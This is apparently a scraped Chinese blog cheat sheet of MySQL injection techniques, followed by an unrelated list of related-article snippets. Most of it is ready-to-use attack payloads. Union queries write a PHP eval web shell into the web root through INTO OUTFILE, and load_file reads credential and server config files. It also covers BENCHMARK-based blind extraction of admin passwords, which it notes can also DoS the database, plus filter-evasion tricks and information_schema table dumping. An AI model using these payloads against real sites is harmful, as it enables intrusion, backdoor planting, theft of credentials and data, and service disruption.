mysql 注入用例_mysql-常用注入渗透手法
mysql:
内置函数常用函数:left(), mid(), ord(), length(), benchmark(),load_file(), outfile(), concat(),
系统重要信息:system_user(), user(), current_user, session_user(), database(), version(),
ASCII码:select char(97,100,109,105,110 ) 回显:admin
16进制:select 0x61646D696E 回显:admin
注释方法: /* --
使用 /**/ 或者 + 代替空格
@@datadir 读取数据库路径
@@basedir MYSQL 安装路径
@@version_compile_os 操作系统
load_file:linux,windows写全路径时候,c:/1.txt, /var/www/1.php 路径均为左斜杠 /
c:/windows/php.ini c:/winnt/php.ini c:/windows/my.ini //管理员登陆过MYSQL会留下密码和用户名 c:/winnt/my.ini c:/boot.ini
/etc/password / /usr/local/httpd/conf/httpd.conf //也许能找到网站默认目录 /usr/local/apache2/conf/httpd.conf //也许能找到网站默认目录哦!FreeBSD下:
load_file(char(47)) 列出了此FreeBSD系统的根目录
读不出来的原因:1.权限不够: and (select count(*) from mysql.user)>0-- 如果返回OK,则表示有权限。如果Denied则NO
2.回显长度限制,Substring(load_file(A),0,50),Substring(load_file(A),50,100)一步一步读 3.concat()拼接
outfile:写入条件:1. 未过滤' ' 2.权限 3.得到网站物理路径
已经上传了JPG小马, unionselect 1,load_file( /var/www/xiaoma.jpg),3,4,5,6 into outfile '/var/www/xiaoma.php'/*
直接写入小马,union select 1,'<?php eval($_POST[cmd])?>',3,4,5,6 into outfile '/var/www/xm.php'/*
||
等价于
||
0x3C3F706870206576616C28245F504F53545B636D645D293F3E
数据库导出马:
create databaseSupers;useSupers;create table SuperT(code text);insert into SuperT(code) values ("<?php @eval($_POST['cmd']);?>");select * from SuperT intooutfile "D:\\xxx\\shell.php";drop database Supers;
View Code
BENCHMARK:重复执行。不仅可以在display_errors=Off时候,无法判断SQL正确与否。让我们盲注的时候判断技巧。而且可以用来DDOS攻击数据库!
id=1 union select 1,benchmark(500000,md5('test')),1 from user where userid=1 and ord(substring(username,1,1))=97 /*UNION SELECT IF(SUBSTRING(user_password,1 ,1) = CHAR(52),BENCHMARK(5000000,md5('test')),null) FROM mb_users WHERE user_group = 1;
View Code
绕过防注入:
id=-255+union+/*!select*/+1,2,3,4 +号代替被顾虑的空格, !
and 1=2 un%ion sel%ect 1,2,3,4,sys%tem_us%er() %绕过被过滤的SQL语句
爆表:
select 0,0,concat(table_name),0 from (select * from (select * from information_schema.tables where table_schema=16进制database()order by table_schema limit 0,1) t order by table_schema desc)t limit 1-- 爆出第1个表
select 0,0,concat(table_name),0 from (select * from (select * from information_schema.tables where table_schema=16进制database()order by table_schema limit 1,1) t order by table_schema desc)t limit 1-- 爆出第2个表
......爆出所有有用的表后,假如得到admin表: 0x61646D696E
select 0,0,concat(cast(count(*) as char)),0 from information_schema.columns where table_name=0x61646D696Eand table_schema=database() limit 1-- 爆出ADMIN表的列数
select 0,0,concat(column_name) from (select * from (select * from information_schema.columns wheretable_name=0x61646D696E and table_schema=database() order by 1 limit 0,1) t order by 1 desc)t limit 1-- 爆出ADMIN表第一个列。即索引为0的列...
root或者足够权限可以爆数据库用户帐户,密码:user password
mysql 注入用例_mysql-常用注入渗透手法相关推荐
- mysql的各种语句_MySQL 常用语句大全
MySQL 常用语句大全 一.连接 MySQL 格式: mysql -h 主机地址 -u 用户名 -p 用户密码 1.例 1:连接到本机上的 MYSQL. 首先在打开 DOS 窗口,然后进入目录 my ...
- mysql 结束符报错_Mysql手工注入小结
前言 实习电话面的时候,问到了sql注入的利用,我扒拉扒拉一大堆,结果脑子一抽,说Mysql注入不支持堆叠注入 我学安全目前最后悔的事情就是,最开始入门的时候,连数据库这门课都没开始学,当时连最基本的 ...
- mysql切换系统盘命令_mysql常用命令
一.连接MySQL 格式: mysql -h主机地址 -u用户名 -p用户密码 1.例1:连接到本机上的MYSQL. 首先在打开DOS窗口,然后进入目录 mysqlbin,再键入命令mysql -ur ...
- mysql 时间函数大全_mysql常用的日期函数汇总
最近做统计时经常用到的几个mysql函数: 1. UNIX_TIMESTAMP() 该函数返回1970到现在的秒数,括号内也可以带参数,即返回1970年到指定时间段的秒数,注意是秒数,常用java的兄 ...
- mysql根据字长查询_MYSQL常用查命令
MYSQL常用查命令: mysql> select version(); 查看MySQL的版本号 mysql> select current_date(); 查 ...
- mysql 命令源码_MySQL常用命令
创建用户 CREATE USER 'root'@'%' IDENTIFIED BY 'password'; 创建用户并赋予指定权限 grant create,select,update,insert, ...
- mysql cascade的用法_MySQL常用操作笔记
1.创建root用户的密码 mysqladmin -u root password "new_password"; 2.连接到Mysql服务器 mysql -u root -p 1 ...
- MySQL退出选择表格_MySQL常用命令
一.连接MySQL 格式:mysql -h主机地址 -u用户名 -p用户密码 1.连接到本机上的MySQ: 首先在打开cmd窗口,输入mysql -uroot -p ,然后空格进入MySQL控制台, ...
- mysql命令的分类_MySQL常用命令分类汇总
一.查询状态类 1.查看当前有哪些数据库? mysql> show databases; 2.查看当前数据库有哪些表? mysql> use database1; mysql> s ...
最新文章
- 面向对象之数值的悲剧(8月28日会议有感)
- spring boot logback_SpringBoot集成logback后访问日志端点
- 想知道spring boot+cloud+docker的微服务体系架构如何使用吗?
- 防止接口数据出问题,前端假数据调试
- 科大星云诗社动态20210410
- Mybatis映射文件动态SQL语句-01
- LeetCode篇之链表:1290(二进制链表转整数)
- leetcode 打印_剑指 Offer 总结 - leetcode 剑指offer系列
- 设置编译out_matlab2017a与 CCS 6.2联调设置
- ntnub原理怎么看_电锤只转不冲击怎么回事?看懂了工作原理,你也可以动手解决...
- IT行业的职员加班到底有没有价值?
- 实现元素拖拽放大缩小_G6 3.6:放大每一处细节
- python使用lxml库对解析后的DOM树形成的xpath计算得到平均值、中位数、方差
- 黑马程序员 Python学习笔记之PyCharm 的初始设置
- OpenCV-图像处理(25、直方图比较)
- 《人工智能:一种现代的方法》总结 第二章
- centos时间同步方案
- 速盘项目(speed盘)
- word文档压缩图片
- umount target is busy
热门文章
- model.train_on_batch介绍【TensorFlow2入门手册】
- 实战项目五:抓取简书文章信息
- 机器学习方法三要素-阿里云大学
- Python字符串的两种方式——百分号方式,format的方式
- No module named Crypto--转
- 魅族大数据之流平台设计部署实践--转
- SolrCloud之分布式索引及与Zookeeper的集成--转载
- /bin/bash^M: bad interpreter: 没有那个文件或目录--转载
- 深入探索 Java 热部署--转
- 手机中的AR是怎么实现的